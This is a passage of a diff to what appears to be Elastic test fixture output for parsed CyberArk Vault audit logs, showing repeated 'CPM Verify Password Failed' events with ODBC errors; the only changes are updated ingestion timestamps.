\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615826099\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", 
@@ -644,7 +689,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193625500Z", + "ingested": "2021-12-14T14:42:29.505125899Z", "original": "\u003c7\u003e1 2021-03-15T16:56:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:56:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:56:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827245\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:56:29\",\"IsoTimestamp\":\"2021-03-15T16:56:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827245\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -754,7 +799,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application", - "ingested": "2021-12-09T13:37:01.193631200Z", + "ingested": "2021-12-14T14:42:29.505126275Z", "original": "\u003c7\u003e1 2021-03-15T17:01:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:01:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:01:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827554\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mariadb\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:01:07\",\"IsoTimestamp\":\"2021-03-15T17:01:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827554\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"mariadb\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -864,7 +909,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-12-09T13:37:01.193636900Z", + "ingested": "2021-12-14T14:42:29.505126654Z", "original": "\u003c7\u003e1 2021-03-15T17:05:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:05:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:05:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827864\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:05:47\",\"IsoTimestamp\":\"2021-03-15T17:05:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827864\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -974,7 +1019,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-12-09T13:37:01.193642600Z", + "ingested": "2021-12-14T14:42:29.505127032Z", "original": "\u003c7\u003e1 2021-03-15T17:10:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:10:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:10:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615828174\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:10:25\",\"IsoTimestamp\":\"2021-03-15T17:10:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615828174\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1085,7 +1130,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193648300Z", + "ingested": "2021-12-14T14:42:29.505127414Z", "original": "\u003c7\u003e1 2021-03-15T17:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:28:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:28:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829287\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 127.0.0.1. 
